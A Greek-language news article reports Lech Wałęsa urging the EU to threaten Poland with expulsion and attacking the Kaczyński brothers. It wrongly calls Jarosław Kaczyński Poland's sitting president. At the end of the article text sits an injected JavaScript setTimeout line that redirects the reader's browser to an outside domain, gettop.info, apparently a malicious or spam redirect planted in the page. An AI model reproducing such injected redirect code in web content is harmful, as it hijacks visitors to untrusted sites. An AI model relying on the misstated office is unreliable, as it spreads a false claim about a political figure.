Βαλέσα: Η ΕΕ να απειλήσει την Πολωνία με αποβολή

0
18

 

«Η Ευρωπαϊκή Ένωση πρέπει να κάνει περισσότερα για τη δημοκρατία. Ζητώ αποτελεσματικές ενέργειες, συμπεριλαμβανομένης και της απειλής αποβολής (της Πολωνίας) από την Ευρωπαϊκή Ένωση. Πρέπει να υπάρχουν κανόνες οι οποίοι να ορίζουν ότι επιβάλλεται η τήρηση των κανόνων στα μέλη της ΕΕ διαφορετικά θα αποβάλλονται!«, είπε σε συζήτηση στρογγυλής τραπέζης στη Βαρσοβία ο Νομπελίστας Ειρήνης και πρώην πρόεδρος της Πολωνίας, Λεχ Βαλέσα.

Μόνο μία λύση βλέπει στην παρούσα κατάσταση των πραγμάτων στη χώρα του: «Xρειαζόμαστε βοήθεια από όλο τον κόσμο, διότι βρισκόμαστε προ ενός αδιεξόδου. Δεν θέλουμε να καταστρέψουμε τη δημοκρατία, σεβόμαστε τις εκλογές αλλά δεν μπορούμε να κάνουμε τίποτα. Με τον λαϊκισμό και τη δημαγωγία οι άνθρωποι του Κατσίνσκι δρομολόγησαν πολλά δεινά και θα συνεχίσουν αν δεν τους σταματήσουμε«.

Ο Βαλέσα επετέθη με δριμύτητα στον νυν πρόεδρο της Πολωνίας Γιάροσλαβ Κατσίνκσι και στον θανόντα σε αεροπορικό δυστύχημα δίδυμο αδελφό του, επίσης πρόεδρο, Λεχ Κατσίνσκι, και είπε ότι δεν τους απάλλαξε τυχαία από όλα τα καθήκοντά τους στη δεκαετία του 1990 όταν εργάζονταν στην προεδρία της Δημοκρατίας: «Και οι δύο ήταν πολύ ευφυείς, πολύ αποτελεσματικοί αλλά όχι κατάλληλοι για την προεδρία της Δημοκρατίας. Για δευτερεύουσες θέσεις ναι, αλλά δεν θα μπορούσαν να είναι ηγέτες, όπως διαπιστώνουμε από τα λάθη τα οποία διαπράττει τώρα ο Κατσίνσκι. Όταν το διαπίστωσα, τους έδιωξα. Τους θεώρησα επικίνδυνους και έκρινα ότι πρέπει να απομακρυνθούν από τις θέσεις τους από τις οποίες μπορούσαν να πάρουν σημαντικές αποφάσεις. Πρόκειται για ανασφαλείς, γεμάτους συμπλέγματα ανθρώπους και γι’ αυτό κοιτάνε προς τα πίσω αντί να κοιτούν μπροστά». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here